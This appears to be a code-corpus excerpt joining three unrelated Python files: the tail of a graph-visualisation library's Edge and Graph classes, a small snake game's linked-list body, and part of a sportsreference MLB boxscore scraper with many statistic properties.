return self._source
def target(self, source=None):
# Deprecated
if source is not None: return self.other_node(source)
return self._target
def set_weight(self, weight=None):
self._weight = weight
pynode_core.add_event(pynode_core.Event(pynode_core.js_edge_set_weight, [self._internal_id, str(weight) if weight is not None else ""]), self)
return self
def weight(self):
return self._weight
def set_directed(self, directed=True):
self._directed = directed
pynode_core.add_event(pynode_core.Event(pynode_core.js_edge_set_directed, [self._internal_id, self._directed]), self)
return self
def directed(self):
return self._directed
def other_node(self, node):
return self._target if (self._source is node or self._source._id == node) else self._source
def set_attribute(self, name, value):
self._attributes[name] = value
return self
def attribute(self, name):
return self._attributes[name] if name in self._attributes else None
def set_priority(self, value):
self._priority = value
return self
def priority(self):
return self._priority
def set_width(self, width=2):
self._width = width
pynode_core.add_event(pynode_core.Event(pynode_core.js_edge_set_width, [self._internal_id, width]), self)
return self
def width(self): return self._width
def set_color(self, color=Color.LIGHT_GREY):
self._color = color
pynode_core.add_event(pynode_core.Event(pynode_core.js_edge_set_color, [self._internal_id, color.hex_string()]), self)
return self
def color(self): return self._color
def set_weight_style(self, size=None, color=None, outline=None):
self._weight_style = CustomStyle(self._weight_style._size if size is None else size, self._weight_style._color if color is None else color, self._weight_style._outline if outline is None else outline)
pynode_core.add_event(pynode_core.Event(pynode_core.js_edge_set_weight_style, [self._internal_id, self._weight_style.data(self)]), self)
return self
def highlight(self, *args, **kwds):
arg_color = kwds["color"] if "color" in kwds else args[0] if len(args) > 0 else None
arg_width = kwds["width"] if "width" in kwds else args[1] if len(args) > 1 else self._width * 2
pynode_core.add_event(pynode_core.Event(pynode_core.js_edge_highlight, [self._internal_id, arg_width, arg_color.hex_string() if arg_color is not None else None]), self)
def traverse(self, initial_node=None, color=Color.RED, keep_path=True, length = 1.0):
if not graph.has_edge(self): return
start = graph.node(initial_node) if initial_node is not None else self._source
if not graph.has_node(start): return
pynode_core.add_event(pynode_core.Event(pynode_core.js_edge_traverse, [self._internal_id, start._internal_id, color.hex_string(), keep_path, length]), self)
def _data(self):
d = {"id": self._internal_id, "source": self._source._internal_id, "target": self._target._internal_id, "weight": str(self._weight) if self._weight is not None else "", "directed": self._directed, "lineWidth": self._width, "weightStyle": self._weight_style.data(self), "stroke": self._color.hex_string()}
return d
def __lt__(self, other): return self._priority < other._priority if isinstance(other, Edge) else NotImplemented
def __le__(self, other): return self._priority <= other._priority if isinstance(other, Edge) else NotImplemented
def __gt__(self, other): return self._priority > other._priority if isinstance(other, Edge) else NotImplemented
def __ge__(self, other): return self._priority >= other._priority if isinstance(other, Edge) else NotImplemented
def __str__(self):
return "(" + str(self._source) + "," + str(self._target) + ")"
class Graph:
def __init__(self):
self._nodes = {}
self._edges = []
self._has_edge_cache = {}
self._spread = 80
def add_node(self, *args, **kwds):
if "node" in kwds: n = kwds["node"]
elif len(args) > 0 and isinstance(args[0], Node): n = args[0]
else: n = Node(*args, **kwds)
if n._id in self._nodes: raise Exception("Duplicate node '" + str(n._id) + "'")
self._nodes[n._id] = n
pynode_core.add_event(pynode_core.Event(pynode_core.js_add_node, [n._data()]))
pause(25)
return n
def remove_node(self, node):
n = self.node(node)
pynode_core.enable_events(False)
for e in n.incident_edges():
self.remove_edge(e)
pynode_core.enable_events(True)
del self._nodes[n._id]
pynode_core.add_event(pynode_core.Event(pynode_core.js_remove_node, [n._internal_id]))
pause(25)
return n
def node(self, id):
if isinstance(id, Node) and id._id in self._nodes:
return id
elif id in self._nodes:
return self._nodes[id]
else:
return None
def nodes(self):
return list(self._nodes.values())
def add_edge(self, *args, **kwds):
if "edge" in kwds: e = kwds["edge"]
elif len(args) > 0 and isinstance(args[0], Edge): e = args[0]
else:
arg_source = kwds["source"] if "source" in kwds else args[0]
arg_target = kwds["target"] if "target" in kwds else args[1]
arg_weight = kwds["weight"] if "weight" in kwds else args[2] if len(args) > 2 else None
arg_directed = kwds["directed"] if "directed" in kwds else args[3] if len(args) > 3 else False
e = Edge(arg_source, arg_target, arg_weight, arg_directed)
if self.has_edge(e): raise Exception("Instance of edge '" + str(e) + "' already in graph.")
original_source = e._source
original_target = e._target
e._source = graph.node(e._source)
e._target = graph.node(e._target)
if e._source is None: raise Exception("Node '" + str(original_source) + "' doesn't exist.")
if e._target is None: raise Exception("Node '" + str(original_target) + "' doesn't exist.")
e._source._incident_edges.append(e)
e._target._incident_edges.append(e)
self._edges.append(e)
self._has_edge_cache[e] = True
pynode_core.add_event(pynode_core.Event(pynode_core.js_add_edge, [e._data()]))
return e
def remove_edge(self, *args, **kwds):
remove_multiple = False
if "edge" in kwds: edge = kwds["edge"]
elif len(args) > 0 and isinstance(args[0], Edge): edge = args[0]
else:
arg_source = kwds["node1"] if "node1" in kwds else args[0]
arg_target = kwds["node2"] if "node2" in kwds else args[1]
arg_directed = kwds["directed"] if "directed" in kwds else args[2] if len(args) > 2 else False
remove_multiple = True
if remove_multiple:
edge_list = self.edges_between(arg_source, arg_target, arg_directed)
self.remove_all(edge_list)
return edge_list
else:
edge._source._incident_edges.remove(edge)
edge._target._incident_edges.remove(edge)
self._edges.remove(edge)
del self._has_edge_cache[edge]
pynode_core.add_event(pynode_core.Event(pynode_core.js_remove_edge, [edge._internal_id]))
return edge
def edges(self):
return list(self._edges)
def set_directed(self, directed=True):
for e in self._edges:
e.set_directed(directed)
def has_node(self, node):
return self.node(node) is not None
def has_edge(self, edge):
return edge in self._has_edge_cache
def adjacent(self, node1, node2, directed=False):
if not self.has_node(node1) or not self.has_node(node2): return False
for n in (self.node(node1).successor_nodes() if directed else self.node(node1).adjacent_nodes()):
if n is self.node(node2): return True
return False
# Deprecated
def adjacent_directed(self, source, target):
return self.adjacent(source, target, True)
def edges_between(self, node1, node2, directed=False):
if not self.has_node(node1) or not self.has_node(node2): return []
edge_list = self.node(node1).outgoing_edges() if directed else self.node(node1)._incident_edges
return [edge for edge in edge_list if edge._target is self.node(node2) or edge._source is self.node(node2)]
# Deprecated
def edges_between_directed(self, source, target):
return self.edges_between(source, target, True)
def adjacency_matrix(self):
m = {}
for r in self._nodes.values():
row = {}
for c in self._nodes.values(): row[c._id] = 0
m[r._id] = row
for r in self._nodes.values():
for c in r.successor_nodes():
m[r._id][c._id] += 1
return m
@staticmethod
def random(order, size, connected=True, mutligraph=False, initial_id=0):
nodes = []
edges = []
adjacency_matrix = [[0 for c in range(order)] for r in range(order)]
edges_remaining = size
id_list = random.sample(range(initial_id, initial_id + order), order)
for i in range(order):
node = Node(id_list[i])
if connected and edges_remaining > 0 and len(nodes) > 0:
connected_node = nodes[random.randint(0, len(nodes) - 1)]
if random.randint(0, 1) == 0: edges.append(Edge(node, connected_node))
else: edges.append(Edge(connected_node, node))
adjacency_matrix[id_list[i] - initial_id][connected_node._id - initial_id] += 1
adjacency_matrix[connected_node._id - initial_id][id_list[i] - initial_id] += 1
edges_remaining -= 1
nodes.append(node)
possible_edges = [(i, j) for i in range(order) for j in range(order)]
random.shuffle(possible_edges)
for e in possible_edges:
if edges_remaining <= 0: break
if (adjacency_matrix[e[0]][e[1]] == 0 and e[0] != e[1]) or mutligraph:
edges.append(Edge(e[0] + initial_id, e[1] + initial_id))
adjacency_matrix[e[0]][e[1]] += 1
adjacency_matrix[e[1]][e[0]] += 1
edges_remaining -= 1
return nodes + edges
def add_all(self, elements):
new_elements = []
pynode_core.enable_events(False)
for x in elements:
if isinstance(x, Node): new_elements.append((0, self.add_node(x)._data()))
elif isinstance(x, Edge): new_elements.append((1, self.add_edge(x)._data()))
else: new_elements.append((0, self.add_node(Node(x))._data()))
pynode_core.enable_events(True)
pynode_core.add_event(pynode_core.Event(pynode_core.js_add_all, [new_elements]))
pause(55)
def remove_all(self, elements):
new_elements = []
pynode_core.enable_events(False)
for x in elements:
if isinstance(x, Node): new_elements.append((0, self.remove_node(x)._data()))
elif isinstance(x, Edge): new_elements.append((1, self.remove_edge(x)._data()))
else: new_elements.append((0, self.remove_node(self.node(x))._data()))
pynode_core.enable_events(True)
pynode_core.add_event(pynode_core.Event(pynode_core.js_remove_all, [new_elements]))
pause(55)
def order(self): return len(self._nodes.values())
def size(self): return len(self._edges)
def set_spread(self, spread=80):
self._spread = spread
pynode_core.add_event(pynode_core.Event(pynode_core.js_set_spread, [spread]))
def clear(self):
self._reset()
pynode_core.add_event(pynode_core.Event(pynode_core.js_clear, []))
def _reset(self):
self._nodes = {}
self._edges = []
self._has_edge_cache = {}
def _exec_code(src):
namespace = locals()
namespace["__name__"] = "__main__"
exec(src, namespace, namespace)
def _execute_function(func, args):
func(*args)
graph = Graph()
``` |
{
"source": "Joseph-D-Bradshaw/pysnake",
"score": 3
} |
#### File: Joseph-D-Bradshaw/pysnake/snake.py
```python
from collections import namedtuple
from enum import Enum
from utils import highlight_cell_at_x_y
Vector = namedtuple('Vector', 'x y')
class Heading(Enum):
NORTH = Vector(0, -1)
EAST = Vector(1, 0)
SOUTH = Vector(0, 1)
WEST = Vector(-1, 0)
class BodyPart:
def __init__(self, x: int, y: int, ref=None, is_head=False):
self.x = x
self.y = y
self.ref = ref
self.is_head = is_head
print(f'LOG CREATION OF PART: {self.__repr__()}')
@property
def next(self):
if type(self.ref) is type(self):
return self.ref
return None
def __repr__(self):
return f'p{id(self)}: ({self.x},{self.y}) -> p{self.next}'
class Snake:
def __init__(self, surface, x: int, y: int):
self._surface = surface
self.head = BodyPart(x, y, is_head=True)
self.heading = Heading.EAST
def draw(self):
part = self.head
highlight_cell_at_x_y(self._surface, part.x, part.y) # draw head
while part.next: # draw rest of the body
part = part.next
highlight_cell_at_x_y(self._surface, part.x, part.y)
def add_part(self):
tail = self.head
while tail.next:
tail = tail.next
# calculate where to add part by heading
x = tail.x - self.heading.value.x
y = tail.y - self.heading.value.y
tail.ref = BodyPart(x, y)
def move(self):
# TODO: Improve move logic so each part moves to the previous parts position
# Doubly Linked List is probably good for this now
part = self.head
while part:
part.x += self.heading.value.x
part.y += self.heading.value.y
part = part.next
``` |
{
"source": "JosephDErwin/sportsreference",
"score": 3
} |
#### File: sportsreference/mlb/boxscore.py
```python
import pandas as pd
import re
from datetime import timedelta
from pyquery import PyQuery as pq
from .. import utils
from ..decorators import float_property_decorator, int_property_decorator
from .constants import (BOXSCORE_ELEMENT_INDEX,
BOXSCORE_SCHEME,
BOXSCORE_URL,
BOXSCORES_URL,
DOUBLE_HEADER_INDICES)
from sportsreference import utils
from sportsreference.constants import AWAY, HOME
from sportsreference.mlb.constants import DAY, NIGHT
from six.moves.urllib.error import HTTPError
class Boxscore(object):
"""
Detailed information about the final statistics for a game.
Stores all relevant information for a game such as the date, time,
location, result, and more advanced metrics such as the number of strikes,
a pitcher's influence on the game, the number of putouts and much more.
Parameters
----------
uri : string
The relative link to the boxscore HTML page, such as
'BOS/BOS201806070'.
"""
def __init__(self, uri):
self._uri = uri
self._date = None
self._time = None
self._attendance = None
self._venue = None
self._time_of_day = None
self._duration = None
self._away_name = None
self._home_name = None
self._winner = None
self._winning_name = None
self._winning_abbr = None
self._losing_name = None
self._losing_abbr = None
self._losing_abbr = None
self._away_at_bats = None
self._away_runs = None
self._away_hits = None
self._away_rbi = None
self._away_earned_runs = None
self._away_bases_on_balls = None
self._away_strikeouts = None
self._away_plate_appearances = None
self._away_batting_average = None
self._away_on_base_percentage = None
self._away_slugging_percentage = None
self._away_on_base_plus = None
self._away_pitches = None
self._away_strikes = None
self._away_win_probability_for_offensive_player = None
self._away_average_leverage_index = None
self._away_win_probability_added = None
self._away_win_probability_subtracted = None
self._away_base_out_runs_added = None
self._away_putouts = None
self._away_assists = None
self._away_innings_pitched = None
self._away_home_runs = None
self._away_strikes_by_contact = None
self._away_strikes_swinging = None
self._away_strikes_looking = None
self._away_grounded_balls = None
self._away_fly_balls = None
self._away_line_drives = None
self._away_unknown_bat_type = None
self._away_game_score = None
self._away_inherited_runners = None
self._away_inherited_score = None
self._away_win_probability_by_pitcher = None
self._away_base_out_runs_saved = None
self._home_at_bats = None
self._home_runs = None
self._home_hits = None
self._home_rbi = None
self._home_earned_runs = None
self._home_bases_on_balls = None
self._home_strikeouts = None
self._home_plate_appearances = None
self._home_batting_average = None
self._home_on_base_percentage = None
self._home_slugging_percentage = None
self._home_on_base_plus = None
self._home_pitches = None
self._home_strikes = None
self._home_win_probability_for_offensive_player = None
self._home_average_leverage_index = None
self._home_win_probability_added = None
self._home_win_probability_subtracted = None
self._home_base_out_runs_added = None
self._home_putouts = None
self._home_assists = None
self._home_innings_pitched = None
self._home_home_runs = None
self._home_strikes_by_contact = None
self._home_strikes_swinging = None
self._home_strikes_looking = None
self._home_grounded_balls = None
self._home_fly_balls = None
self._home_line_drives = None
self._home_unknown_bat_type = None
self._home_game_score = None
self._home_inherited_runners = None
self._home_inherited_score = None
self._home_win_probability_by_pitcher = None
self._home_base_out_runs_saved = None
self._parse_game_data(uri)
def _retrieve_html_page(self, uri):
"""
Download the requested HTML page.
Given a relative link, download the requested page and strip it of all
comment tags before returning a pyquery object which will be used to
parse the data.
Parameters
----------
uri : string
The relative link to the boxscore HTML page, such as
'BOS/BOS201806070'.
Returns
-------
PyQuery object
The requested page is returned as a queriable PyQuery object with
the comment tags removed.
"""
url = BOXSCORE_URL % uri
try:
url_data = pq(url)
except HTTPError:
return None
return pq(utils._remove_html_comment_tags(url_data))
def _parse_game_date_and_location(self, boxscore):
"""
Retrieve the game's date and location.
The game's meta information, such as date, location, attendance, and
duration, follow a complex parsing scheme that changes based on the
layout of the page. The information should be able to be parsed and set
regardless of the order and how much information is included. To do
this, the meta information should be iterated through line-by-line and
fields should be determined by the values that are found in each line.
Parameters
----------
boxscore : PyQuery object
A PyQuery object containing all of the HTML data from the boxscore.
"""
scheme = BOXSCORE_SCHEME["game_info"]
items = [i.text() for i in boxscore(scheme).items()]
game_info = items[0].split('\n')
attendance = None
date = None
duration = None
time = None
time_of_day = None
venue = None
if len(game_info) > 0:
date = game_info[0]
for line in game_info:
if 'Start Time: ' in line:
time = line.replace('Start Time: ', '')
if 'Attendance: ' in line:
attendance = line.replace('Attendance: ', '').replace(',', '')
if 'Venue: ' in line:
venue = line.replace('Venue: ', '')
if 'Game Duration: ' in line:
duration = line.replace('Game Duration: ', '')
if 'Night Game' in line or 'Day Game' in line:
time_of_day = line
setattr(self, '_attendance', attendance)
setattr(self, '_date', date)
setattr(self, '_duration', duration)
setattr(self, '_time', time)
setattr(self, '_time_of_day', time_of_day)
setattr(self, '_venue', venue)
def _parse_name(self, field, boxscore):
"""
Retrieve the team's complete name tag.
Both the team's full name (embedded in the tag's text) and the team's
abbreviation are stored in the name tag which can be used to parse
the winning and losing team's information.
Parameters
----------
field : string
The name of the attribute to parse
boxscore : PyQuery object
A PyQuery object containing all of the HTML data from the boxscore.
Returns
-------
PyQuery object
The complete text for the requested tag.
"""
scheme = BOXSCORE_SCHEME[field]
return boxscore(scheme)
def _parse_game_data(self, uri):
"""
Parses a value for every attribute.
This function looks through every attribute and retrieves the value
according to the parsing scheme and index of the attribute from the
passed HTML data. Once the value is retrieved, the attribute's value is
updated with the returned result.
Note that this method is called directly once Boxscore is invoked and
does not need to be called manually.
Parameters
----------
uri : string
The relative link to the boxscore HTML page, such as
'BOS/BOS201806070'.
"""
boxscore = self._retrieve_html_page(uri)
# If the boxscore is None, the game likely hasn't been played yet and
# no information can be gathered. As there is nothing to grab, the
# class instance should just be empty.
if not boxscore:
return
for field in self.__dict__:
# Remove the '_' from the name
short_field = str(field)[1:]
if short_field == 'winner' or \
short_field == 'winning_name' or \
short_field == 'winning_abbr' or \
short_field == 'losing_name' or \
short_field == 'losing_abbr' or \
short_field == 'uri' or \
short_field == 'date' or \
short_field == 'time' or \
short_field == 'venue' or \
short_field == 'attendance' or \
short_field == 'time_of_day' or \
short_field == 'duration':
continue
if short_field == 'away_name' or \
short_field == 'home_name':
value = self._parse_name(short_field, boxscore)
setattr(self, field, value)
continue
index = 0
if short_field in BOXSCORE_ELEMENT_INDEX.keys():
index = BOXSCORE_ELEMENT_INDEX[short_field]
value = utils._parse_field(BOXSCORE_SCHEME,
boxscore,
short_field,
index)
setattr(self, field, value)
self._parse_game_date_and_location(boxscore)
@property
def dataframe(self):
"""
Returns a pandas DataFrame containing all other class properties and
values. The index for the DataFrame is the string URI that is used to
instantiate the class, such as 'BOS201806070'.
"""
if self._away_runs is None and self._home_runs is None:
return None
fields_to_include = {
'date': self.date,
'time': self.time,
'venue': self.venue,
'attendance': self.attendance,
'duration': self.duration,
'time_of_day': self.time_of_day,
'winner': self.winner,
'winning_name': self.winning_name,
'winning_abbr': self.winning_abbr,
'losing_name': self.losing_name,
'losing_abbr': self.losing_abbr,
'away_at_bats': self.away_at_bats,
'away_runs': self.away_runs,
'away_hits': self.away_hits,
'away_rbi': self.away_rbi,
'away_earned_runs': self.away_earned_runs,
'away_bases_on_balls': self.away_bases_on_balls,
'away_strikeouts': self.away_strikeouts,
'away_plate_appearances': self.away_plate_appearances,
'away_batting_average': self.away_batting_average,
'away_on_base_percentage': self.away_on_base_percentage,
'away_slugging_percentage': self.away_slugging_percentage,
'away_on_base_plus': self.away_on_base_plus,
'away_pitches': self.away_pitches,
'away_strikes': self.away_strikes,
'away_win_probability_for_offensive_player':
self.away_win_probability_for_offensive_player,
'away_average_leverage_index': self.away_average_leverage_index,
'away_win_probability_added': self.away_win_probability_added,
'away_win_probability_subtracted':
self.away_win_probability_subtracted,
'away_base_out_runs_added': self.away_base_out_runs_added,
'away_putouts': self.away_putouts,
'away_assists': self.away_assists,
'away_innings_pitched': self.away_innings_pitched,
'away_home_runs': self.away_home_runs,
'away_strikes_by_contact': self.away_strikes_by_contact,
'away_strikes_swinging': self.away_strikes_swinging,
'away_strikes_looking': self.away_strikes_looking,
'away_grounded_balls': self.away_grounded_balls,
'away_fly_balls': self.away_fly_balls,
'away_line_drives': self.away_line_drives,
'away_unknown_bat_type': self.away_unknown_bat_type,
'away_game_score': self.away_game_score,
'away_inherited_runners': self.away_inherited_runners,
'away_inherited_score': self.away_inherited_score,
'away_win_probability_by_pitcher':
self.away_win_probability_by_pitcher,
'away_base_out_runs_saved': self.away_base_out_runs_saved,
'home_at_bats': self.home_at_bats,
'home_runs': self.home_runs,
'home_hits': self.home_hits,
'home_rbi': self.home_rbi,
'home_earned_runs': self.home_earned_runs,
'home_bases_on_balls': self.home_bases_on_balls,
'home_strikeouts': self.home_strikeouts,
'home_plate_appearances': self.home_plate_appearances,
'home_batting_average': self.home_batting_average,
'home_on_base_percentage': self.home_on_base_percentage,
'home_slugging_percentage': self.home_slugging_percentage,
'home_on_base_plus': self.home_on_base_plus,
'home_pitches': self.home_pitches,
'home_strikes': self.home_strikes,
'home_win_probability_for_offensive_player':
self.home_win_probability_for_offensive_player,
'home_average_leverage_index': self.home_average_leverage_index,
'home_win_probability_added': self.home_win_probability_added,
'home_win_probability_subtracted':
self.home_win_probability_subtracted,
'home_base_out_runs_added': self.home_base_out_runs_added,
'home_putouts': self.home_putouts,
'home_assists': self.home_assists,
'home_innings_pitched': self.home_innings_pitched,
'home_home_runs': self.home_home_runs,
'home_strikes_by_contact': self.home_strikes_by_contact,
'home_strikes_swinging': self.home_strikes_swinging,
'home_strikes_looking': self.home_strikes_looking,
'home_grounded_balls': self.home_grounded_balls,
'home_fly_balls': self.home_fly_balls,
'home_line_drives': self.home_line_drives,
'home_unknown_bat_type': self.home_unknown_bat_type,
'home_game_score': self.home_game_score,
'home_inherited_runners': self.home_inherited_runners,
'home_inherited_score': self.home_inherited_score,
'home_win_probability_by_pitcher':
self.home_win_probability_by_pitcher,
'home_base_out_runs_saved': self.home_base_out_runs_saved
}
return pd.DataFrame([fields_to_include], index=[self._uri])
@property
def date(self):
"""
Returns a ``string`` of the date the game took place.
"""
return self._date
@property
def time(self):
"""
Returns a ``string`` of the time the game started.
"""
return self._time
@property
def venue(self):
"""
Returns a ``string`` of the name of the ballpark where the game was
played.
"""
return self._venue
@int_property_decorator
def attendance(self):
"""
Returns an ``int`` of the game's listed attendance.
"""
return self._attendance
@property
def duration(self):
"""
Returns a ``string`` of the game's duration in the format 'H:MM'.
"""
return self._duration
@property
def time_of_day(self):
"""
Returns a ``string`` constant indicated whether the game was played
during the day or at night.
"""
if 'night' in self._time_of_day.lower():
return NIGHT
return DAY
@property
def winner(self):
"""
Returns a ``string`` constant indicating whether the home or away team
won.
"""
if self.home_runs > self.away_runs:
return HOME
return AWAY
@property
def winning_name(self):
"""
Returns a ``string`` of the winning team's name, such as 'Houston
Astros'.
"""
if self.winner == HOME:
return self._home_name.text()
return self._away_name.text()
@property
def winning_abbr(self):
"""
Returns a ``string`` of the winning team's abbreviation, such as 'HOU'
for the Houston Astros.
"""
if self.winner == HOME:
return utils._parse_abbreviation(self._home_name)
return utils._parse_abbreviation(self._away_name)
@property
def losing_name(self):
"""
Returns a ``string`` of the losing team's name, such as '<NAME>
Dodgers'.
"""
if self.winner == HOME:
return self._away_name.text()
return self._home_name.text()
@property
def losing_abbr(self):
"""
Returns a ``string`` of the losing team's abbreviation, such as 'LAD'
for the Los Angeles Dodgers.
"""
if self.winner == HOME:
return utils._parse_abbreviation(self._away_name)
return utils._parse_abbreviation(self._home_name)
@int_property_decorator
def away_at_bats(self):
"""
Returns an ``int`` of the number of at bats the away team had.
"""
return self._away_at_bats
@int_property_decorator
def away_runs(self):
"""
Returns an ``int`` of the number of runs the away team scored.
"""
return self._away_runs
@int_property_decorator
def away_hits(self):
"""
Returns an ``int`` of the number of hits the away team had.
"""
return self._away_hits
@int_property_decorator
def away_rbi(self):
"""
Returns an ``int`` of the number of runs batted in the away team
registered.
"""
return self._away_rbi
@float_property_decorator
def away_earned_runs(self):
"""
Returns a ``float`` of the number of runs the away team earned.
"""
return self._away_earned_runs
@int_property_decorator
def away_bases_on_balls(self):
"""
Returns an ``int`` of the number of bases the away team registerd as a
result of balls.
"""
return self._away_bases_on_balls
@int_property_decorator
def away_strikeouts(self):
"""
Returns an ``int`` of the number of times the away team was struck out.
"""
return self._away_strikeouts
@int_property_decorator
def away_plate_appearances(self):
"""
Returns an ``int`` of the number of plate appearances the away team
made.
"""
return self._away_plate_appearances
@float_property_decorator
def away_batting_average(self):
"""
Returns a ``float`` of the batting average for the away team.
"""
return self._away_batting_average
@float_property_decorator
def away_on_base_percentage(self):
"""
Returns a ``float`` of the percentage of at bats that result in the
batter getting on base.
"""
return self._away_on_base_percentage
@float_property_decorator
def away_slugging_percentage(self):
"""
Returns a ``float`` of the slugging percentage for the away team based
on the number of bases gained per at-bat with bigger plays getting more
weight.
"""
return self._away_slugging_percentage
@float_property_decorator
def away_on_base_plus(self):
"""
Returns a ``float`` of the on base percentage plus the slugging
percentage. Percentage ranges from 0-1.
"""
return self._away_on_base_plus
@int_property_decorator
def away_pitches(self):
"""
Returns an ``int`` of the number of pitches the away team faced.
"""
return self._away_pitches
@int_property_decorator
def away_strikes(self):
"""
Returns an ``int`` of the number of times a strike was called against
the away team.
"""
return self._away_strikes
@float_property_decorator
def away_win_probability_for_offensive_player(self):
"""
Returns a ``float`` of the overall influence the away team's offense
had on the outcome of the game where 0.0 denotes no influence and 1.0
denotes the offense was solely responsible for the outcome.
"""
return self._away_win_probability_for_offensive_player
@float_property_decorator
def away_average_leverage_index(self):
"""
Returns a ``float`` of the amount of pressure the away team's pitcher
faced during the game. 1.0 denotes average pressure while numbers less
than 0 denote lighter pressure.
"""
return self._away_average_leverage_index
@float_property_decorator
def away_win_probability_added(self):
"""
Returns a ``float`` of the total positive influence the away team's
offense had on the outcome of the game.
"""
return self._away_win_probability_added
@float_property_decorator
def away_win_probability_subtracted(self):
"""
Returns a ``float`` of the total negative influence the away team's
offense had on the outcome of the game.
"""
return self._away_win_probability_subtracted
@float_property_decorator
def away_base_out_runs_added(self):
"""
Returns a ``float`` of the number of base out runs added by the away
team.
"""
return self._away_base_out_runs_added
@int_property_decorator
def away_putouts(self):
"""
Returns an ``int`` of the number of putouts the away team registered.
"""
return self._away_putouts
@int_property_decorator
def away_assists(self):
"""
Returns an ``int`` of the number of assists the away team registered.
"""
return self._away_assists
@float_property_decorator
def away_innings_pitched(self):
"""
Returns a ``float`` of the number of innings the away team pitched.
"""
return self._away_innings_pitched
@int_property_decorator
def away_home_runs(self):
"""
Returns an ``int`` of the number of times the away team gave up a home
run.
"""
return self._away_home_runs
@int_property_decorator
def away_strikes_by_contact(self):
"""
Returns an ``int`` of the number of times the away team struck out a
batter who made contact with the pitch.
"""
return self._away_strikes_by_contact
@int_property_decorator
def away_strikes_swinging(self):
"""
Returns an ``int`` of the number of times the away team struck out a
batter who was swinging.
"""
return self._away_strikes_swinging
@int_property_decorator
def away_strikes_looking(self):
"""
Returns an ``int`` of the number of times the away team struck out a
batter who was looking.
"""
return self._away_strikes_looking
@int_property_decorator
def away_grounded_balls(self):
"""
Returns an ``int`` of the number of grounded balls the away team
allowed.
"""
return self._away_grounded_balls
@int_property_decorator
def away_fly_balls(self):
"""
Returns an ``int`` of the number of fly balls the away team allowed.
"""
return self._away_fly_balls
@int_property_decorator
def away_line_drives(self):
"""
Returns an ``int`` of the number of line drives the away team allowed.
"""
return self._away_line_drives
@int_property_decorator
def away_unknown_bat_type(self):
"""
Returns an ``int`` of the number of away at bats that were not properly
tracked and therefore cannot be safely placed in another statistical
category.
"""
return self._away_unknown_bat_type
@int_property_decorator
def away_game_score(self):
"""
Returns an ``int`` of the starting away pitcher's score determine by
many factors, such as number of runs scored against, number of strikes,
etc.
"""
return self._away_game_score
@int_property_decorator
def away_inherited_runners(self):
"""
Returns an ``int`` of the number of runners a pitcher inherited when he
entered the game.
"""
return self._away_inherited_runners
@int_property_decorator
def away_inherited_score(self):
"""
Returns an ``int`` of the number of scorers a pitcher inherited when he
entered the game.
"""
return self._away_inherited_score
@float_property_decorator
def away_win_probability_by_pitcher(self):
"""
Returns a ``float`` of the amount of influence the away pitcher had on
the game's result with 0.0 denoting zero influence and 1.0 denoting he
was solely responsible for the team's win.
"""
return self._away_win_probability_by_pitcher
@float_property_decorator
def away_base_out_runs_saved(self):
"""
Returns a ``float`` of the number of runs saved by the away pitcher
based on the number of players on bases. 0.0 denotes an average value.
"""
return self._away_base_out_runs_saved
@int_property_decorator
def home_at_bats(self):
"""
Returns an ``int`` of the number of at bats the home team had.
"""
return self._home_at_bats
@int_property_decorator
def home_runs(self):
"""
Returns an ``int`` of the number of runs the home team scored.
"""
return self._home_runs
@int_property_decorator
def home_hits(self):
"""
Returns an ``int`` of the number of hits the home team had.
"""
return self._home_hits
@int_property_decorator
def home_rbi(self):
"""
Returns an ``int`` of the number of runs batted in the home team
registered.
"""
return self._home_rbi
@float_property_decorator
def home_earned_runs(self):
"""
Returns a ``float`` of the number of runs the home team earned.
"""
return self._home_earned_runs
@int_property_decorator
def home_bases_on_balls(self):
"""
Returns an ``int`` of the number of bases the home team registerd as a
result of balls.
"""
return self._home_bases_on_balls
@int_property_decorator
def home_strikeouts(self):
"""
Returns an ``int`` of the number of times the home team was struck out.
"""
return self._home_strikeouts
@int_property_decorator
def home_plate_appearances(self):
"""
Returns an ``int`` of the number of plate appearances the home team
made.
"""
return self._home_plate_appearances
@float_property_decorator
def home_batting_average(self):
"""
Returns a ``float`` of the batting average for the home team.
"""
return self._home_batting_average
@float_property_decorator
def home_on_base_percentage(self):
"""
Returns a ``float`` of the percentage of at bats that result in the
batter getting on base.
"""
return self._home_on_base_percentage
@float_property_decorator
def home_slugging_percentage(self):
"""
Returns a ``float`` of the slugging percentage for the home team based
on the number of bases gained per at-bat with bigger plays getting more
weight.
"""
return self._home_slugging_percentage
@float_property_decorator
def home_on_base_plus(self):
"""
Returns a ``float`` of the on base percentage plus the slugging
percentage. Percentage ranges from 0-1.
"""
return self._home_on_base_plus
@int_property_decorator
def home_pitches(self):
"""
Returns an ``int`` of the number of pitches the home team faced.
"""
return self._home_pitches
@int_property_decorator
def home_strikes(self):
"""
Returns an ``int`` of the number of times a strike was called against
the home team.
"""
return self._home_strikes
@float_property_decorator
def home_win_probability_for_offensive_player(self):
"""
Returns a ``float`` of the overall influence the home team's offense
had on the outcome of the game where 0.0 denotes no influence and 1.0
denotes the offense was solely responsible for the outcome.
"""
return self._home_win_probability_for_offensive_player
@float_property_decorator
def home_average_leverage_index(self):
"""
Returns a ``float`` of the amount of pressure the home team's pitcher
faced during the game. 1.0 denotes average pressure while numbers less
than 0 denote lighter pressure.
"""
return self._home_average_leverage_index
@float_property_decorator
def home_win_probability_added(self):
"""
Returns a ``float`` of the total positive influence the home team's
offense had on the outcome of the game.
"""
return self._home_win_probability_added
@float_property_decorator
def home_win_probability_subtracted(self):
"""
Returns a ``float`` of the total negative influence the home team's
offense had on the outcome of the game.
"""
return self._home_win_probability_subtracted
@float_property_decorator
def home_base_out_runs_added(self):
"""
Returns a ``float`` of the number of base out runs added by the home
team.
"""
return self._home_base_out_runs_added
@int_property_decorator
def home_putouts(self):
"""
Returns an ``int`` of the number of putouts the home team registered.
"""
return self._home_putouts
@int_property_decorator
def home_assists(self):
"""
Returns an ``int`` of the number of assists the home team registered.
"""
return self._home_assists
@float_property_decorator
def home_innings_pitched(self):
"""
Returns a ``float`` of the number of innings the home team pitched.
"""
return self._home_innings_pitched
@int_property_decorator
def home_home_runs(self):
"""
Returns an ``int`` of the number of times the home team gave up a home
run.
"""
return self._home_home_runs
@int_property_decorator
def home_strikes_by_contact(self):
"""
Returns an ``int`` of the number of times the home team struck out a
batter who made contact with the pitch.
"""
return self._home_strikes_by_contact
@int_property_decorator
def home_strikes_swinging(self):
"""
Returns an ``int`` of the number of times the home team struck out a
batter who was swinging.
"""
return self._home_strikes_swinging
@int_property_decorator
def home_strikes_looking(self):
"""
Returns an ``int`` of the number of times the home team struck out a
batter who was looking.
"""
return self._home_strikes_looking
